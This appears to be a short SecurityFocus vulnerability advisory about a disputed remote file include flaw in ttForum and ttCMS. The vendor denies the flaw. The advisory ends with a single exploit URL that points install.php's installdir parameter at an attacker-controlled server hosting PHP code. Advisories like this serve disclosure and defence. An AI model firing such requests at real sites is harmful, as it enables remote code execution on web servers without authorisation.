9 lines
No EOL
685 B
Text
9 lines
No EOL
685 B
Text
source: https://www.securityfocus.com/bid/7542/info
|
|
|
|
A remote file include vulnerability has been reported for both ttForum and ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'News.php' and 'Install.php' scripts, it is possible for a remote attacker to include a malicious PHP file in a URL.
|
|
|
|
Successful exploitation will result in the execution of the attacker-supplied PHP instructions with the privileges of the web server.
|
|
|
|
There are conflicting reports about whether or not this issue exists. The vendor has stated that exploitation of this issue is not possible.
|
|
|
|
http://www.example.com/install.php?step=7&installdir=http://yourserver/Settings.php |